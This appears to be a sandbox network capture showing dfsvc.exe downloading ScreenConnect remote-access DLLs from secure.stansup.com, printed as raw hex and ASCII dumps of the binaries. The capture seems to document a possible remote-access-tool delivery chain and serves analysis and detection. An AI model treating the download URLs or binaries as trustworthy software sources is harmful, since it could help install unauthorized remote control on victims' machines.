                                                                                                                                                                                                                                                      2024-10-25 17:27:35 UTC16384INData Raw: 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 6b
                                                                                                                                                                                                                                                      Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkkk
                                                                                                                                                                                                                                                      2024-10-25 17:27:35 UTC16384INData Raw: 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 61
                                                                                                                                                                                                                                                      Data Ascii: equestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadata
                                                                                                                                                                                                                                                      2024-10-25 17:27:35 UTC16384INData Raw: 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 65
                                                                                                                                                                                                                                                      Data Ascii: Monitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceive
                                                                                                                                                                                                                                                      2024-10-25 17:27:35 UTC16384INData Raw: 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 75
                                                                                                                                                                                                                                                      Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVolu
                                                                                                                                                                                                                                                      2024-10-25 17:27:35 UTC16384INData Raw: 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 01
                                                                                                                                                                                                                                                      Data Ascii: tMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      9192.168.2.104972779.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:36 UTC120OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 1721856
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:36 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 ae 85 b3 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 92 5c 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 a5 6f 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0>\ ` o@
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 00 0a 99 00 0c 00 00 00 00 02 00 81 00 24 a5 00 0c 00 00 00 00 02 00 73 00 7d f0 00 07 00 00 00 00 02 00 06 00 f1 f7 00 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 de 00 00 06 72 71 06 00 70 28 01 02 00 0a 0a 02 06 28 bb 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 bc 00 00 06 18 8d d6 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 02 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 03 02 00 0a 73 04 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0b 01 00 06 1f 0a 16 20 7c 4f 00 00 73 06 02 00 0a 28 6e 01 00 0a 2c 35 20 05 01 00 00 73 07 02 00 0a 0a 06 6f 08 02 00 0a 06 28 ea 01 00 06 0b 07 16 30 0b 28 c0 01 00 0a 28 c7 00 00 06 7a 06 16 07 6f 09 02
                                                                                                                                                                                                                                                      Data Ascii: $s}0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5 so(0((zo
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c cb 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4b 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 51 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f 1f 5f 62 8d d8 00 00 01 7d 00 01 00 04 02 7b 00 01 00 04 8e 69 d0 d8 00 00 01 28 51 00 00 0a 28 0f 02 00 0a 5a 0c 02 7b 00 01 00 04 08
                                                                                                                                                                                                                                                      Data Ascii: (-*{*s{z2{*0<{3{(NoO3}+sK{}*(Q*z(,}(NoO}**0{,;*}%X_b}{i(Q(Z{
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 00 37 cc 76 22 06 00 7e 54 76 22 06 00 81 90 76 22 06 00 66 a3 76 22 06 00 43 aa 76 22 06 00 ad cf 79 22 06 00 bc 45 79 22 06 00 54 46 76 22 06 00 ce 58 76 22 06 00 6c bf 76 22 06 00 f8 69 76 22 06 00 56 9f 76 22 06 00 af 60 76 22 06 00 fe ce 76 22 06 00 bb 5f 76 22 06 00 d3 51 2d 25 06 00 99 be 76 22 06 00 11 be 76 22 06 10 24 51 ff 25 06 06 80 30 af 08 56 80 36 c8 03 26 56 80 1f c8 03 26 06 06 80 30 af 08 56 80 fc 9c 08 26 06 06 80 30 af 08 56 80 62 27 0d 26 56 80 90 29 0d 26 56 80 b9 0d 0d 26 56 80 86 29 0d 26 06 06 80 30 76 22 56 80 2c 39 12 26 56 80 4d c8 12 26 56 80 5f 39 12 26 56 80 16 bd 12 26 56 80 d2 9b 12 26 56 80 e8 c0 12 26 56 80 72 7f 12 26 56 80 12 c8 12 26 56 80 ae 9b 12 26 56 80 71 88 12 26 56 80 c1 6c 12 26 56 80 b0 6c 12 26 56 80 88 6b
                                                                                                                                                                                                                                                      Data Ascii: 7v"~Tv"v"fv"Cv"y"Ey"TFv"Xv"lv"iv"Vv"`v"v"_v"Q-%v"v"$Q%0V6&V&0V&0Vb'&V)&V&V)&0v"V,9&VM&V_9&V&V&V&Vr&V&V&Vq&Vl&Vl&Vk
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: a5 00 00 00 00 83 00 c1 07 09 3b 0d 07 71 a5 00 00 00 00 91 18 df 98 16 27 0e 07 7d a5 00 00 00 00 86 18 b4 98 01 00 0e 07 85 a5 00 00 00 00 83 00 8e 02 27 3b 0e 07 8d a5 00 00 00 00 83 00 14 0a 27 3b 0f 07 95 a5 00 00 00 00 86 18 b4 98 05 00 10 07 b4 a5 00 00 00 00 e1 01 73 58 01 00 11 07 ec a5 00 00 00 00 e1 01 ed c1 3d 00 11 07 b8 a7 00 00 00 00 81 00 ab 0d 01 00 11 07 d4 a7 00 00 00 00 e1 09 86 bb e8 18 11 07 dc a7 00 00 00 00 e1 01 c9 b5 01 00 11 07 e3 a7 00 00 00 00 e1 09 4c bc 4e 00 11 07 ec a7 00 00 00 00 e1 01 84 97 2e 3b 11 07 40 a8 00 00 00 00 e1 01 50 98 64 00 11 07 00 00 01 00 80 6b 00 00 01 00 68 a5 00 00 01 00 80 6b 00 00 01 00 bd 5e 00 00 01 00 68 a5 00 00 01 00 bd 5e 00 00 01 00 ba 74 00 00 01 00 02 a7 00 00 01 00 ba 74 00 00 01 00 8c ca
                                                                                                                                                                                                                                                      Data Ascii: ;q'}';';sX=LN.;@Pdkhk^h^tt
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 4c 7c 04 39 02 fc 6f 89 01 99 02 a9 6a 7c 04 99 02 ef 58 43 1b 99 07 e2 6a 3d 0b 4c 04 6f 98 5b 00 54 04 6b bc 49 00 44 02 81 0d d9 00 08 00 14 00 2d 1c 08 00 18 00 32 1c 08 00 1c 00 37 1c 08 00 20 00 3c 1c 08 00 b8 00 41 1c 0e 00 bc 00 46 1c 0e 00 c0 00 59 1c 0e 00 c4 00 6a 1c 08 00 c8 00 7d 1c 08 00 cc 00 82 1c 0e 00 d0 00 87 1c 0e 00 d4 00 96 1c 0e 00 d8 00 a5 1c 0e 00 e0 00 ce 1c 08 00 f0 00 6c 1d 08 00 f4 00 71 1d 08 00 f8 00 76 1d 08 00 1c 01 2d 1c 08 00 20 01 32 1c 08 00 24 01 37 1c 09 00 28 01 32 1c 09 00 2c 01 37 1c 09 00 30 01 7b 1d 09 00 34 01 80 1d 09 00 38 01 32 1c 09 00 3c 01 37 1c 09 00 40 01 32 1c 09 00 44 01 37 1c 09 00 48 01 7b 1d 09 00 4c 01 80 1d 09 00 50 01 85 1d 09 00 54 01 8a 1d 09 00 58 01 8f 1d 09 00 5c 01 94 1d 09 00 60 01 99 1d
                                                                                                                                                                                                                                                      Data Ascii: L|9oj|XCj=Lo[TkID-27 <AFYj}lqv- 2$7(2,70{482<7@2D7H{LPTX\`
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 6e 49 6e 66 6f 73 3e 62 5f 5f 32 38 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 35 39 5f 31 00 55 53 45 52 5f 49 4e 46 4f 5f 31 00 3c 52 65 70 6c 61 63 65 57 6e 64 50 72 6f 63 3e 62 5f 5f 31 00 3c 52 75 6e 43 6f 6d 6d 61 6e 64 4c 69 6e 65 50 72 6f 67 72 61 6d 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 6b 74 6f 70 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 63 65 6e 64 65 6e 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 4e 61 6d 65 73 3e
                                                                                                                                                                                                                                                      Data Ascii: nInfos>b__28_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>c__DisplayClass159_1USER_INFO_1<ReplaceWndProc>b__1<RunCommandLineProgram>b__1<GetDesktopWindowHandles>b__1<GetWindowHandles>b__1<GetDescendentWindowHandles>b__1<GetWindowStationNames>
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70 46 69 6c 65 00 70 4f 75 74 70 75 74 46 69 6c 65 00 70 73 7a 46 69 6c 65 00 43 72 65 61 74 65 50 72 6f 66 69 6c 65 00 44 65 6c 65 74 65 50 72 6f 66 69 6c 65 00 75 73 72 69 34 5f 70 72 6f 66 69 6c 65 00 70 70 66 69 6c 65 00 45 52 6f 6c 65 00 72 6f 6c 65 00 41 6c 6c 6f 63 43 6f 6e 73 6f 6c 65 00 46 72 65 65 43 6f 6e 73 6f 6c 65 00 77 42 69 74 73 50 65 72 53 61 6d 70 6c 65 00 6c 70 54 69 74 6c 65 00 41 64 64 41 63 63 65 73 73 52 75 6c 65 00 46 69 6c 65 53 79 73 74 65 6d 41 63 63 65 73 73 52 75 6c 65 00 53 65 74 41 63 63 65 73 73 52
                                                                                                                                                                                                                                                      Data Ascii: leMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelpFilepOutputFilepszFileCreateProfileDeleteProfileusri4_profileppfileERoleroleAllocConsoleFreeConsolewBitsPerSamplelpTitleAddAccessRuleFileSystemAccessRuleSetAccessR
                                                                                                                                                                                                                                                      2024-10-25 17:27:38 UTC16384INData Raw: 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 50 72 6f 70 56 61 72 69 61 6e 74 43 6c 65 61 72 00 45 6e 73 75 72 65 53 74 61 72 74 73 57 69 74 68 43 68 61 72 00 43 6f 6e 76 65 72 74 42 6f 74 68 53 6c 61 73 68 65 73 54 6f 43 68 61 72 00 44 69 72 65 63 74 6f 72 79 53 65 70 61 72 61 74 6f 72 43 68 61 72 00 70 72 6f 70 76 61 72 00 65 5f 63 70 61 72 68 64 72 00 49 73 4d 65 6d 62 65 72 00 6d 61 67 69 63 4e 75 6d 62 65 72 00 64 77 42 75 69 6c 64 4e 75 6d 62 65 72 00 46 69 6c 65 48 65 61 64 65 72 00 77 61 76 65 49 6e 50 72 65 70 61 72 65 48 65 61 64 65 72 00 77 61 76 65 4f 75 74 50 72 65 70 61 72 65 48
                                                                                                                                                                                                                                                      Data Ascii: LastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.LinqPropVariantClearEnsureStartsWithCharConvertBothSlashesToCharDirectorySeparatorCharpropvare_cparhdrIsMembermagicNumberdwBuildNumberFileHeaderwaveInPrepareHeaderwaveOutPrepareH
                                                                                                                                                                                                                                                      2024-10-25 17:27:38 UTC16384INData Raw: 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00 42 6c 6f 63 6b 43 6f 70 79 00 61 6c 6c 6f 77 43 6f 70 79 00 65 6e 74 72 6f 70 79 00 54 72 79 00 54 6f 6b 65 6e 50 72 69 6d 61 72 79 00 54 6f 44 69 63 74 69 6f 6e 61 72 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 46 72 65 65 4c 69 62 72 61 72 79 00 49 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 4c 6f 61 64 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 46 72 65 65 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 44 69 73 6b 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 4d 65 6d 6f 72 79 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 4f 62 6a 65 63 74 51 75 65 72 79 00 53 65 6c
                                                                                                                                                                                                                                                      Data Ascii: lypointlySelectManyShutdownBlockReasonDestroyBlockCopyallowCopyentropyTryTokenPrimaryToDictionaryLoadLibraryFreeLibraryINativeLibraryTryLoadNativeLibraryTryFreeNativeLibraryWindowsDiskNativeLibraryWindowsMemoryNativeLibraryObjectQuerySel


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      10192.168.2.104972879.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:42 UTC102OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:27:43 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 68096
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:27:42 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:27:43 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 6b f4 c6 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 e1 02 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELk" 0 @ @
                                                                                                                                                                                                                                                      2024-10-25 17:27:43 UTC16384INData Raw: 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                                                      2024-10-25 17:27:43 UTC16384INData Raw: 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 02
                                                                                                                                                                                                                                                      Data Ascii: --.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                      2024-10-25 17:27:43 UTC16384INData Raw: 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e 76
                                                                                                                                                                                                                                                      Data Ascii: tyActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionInv
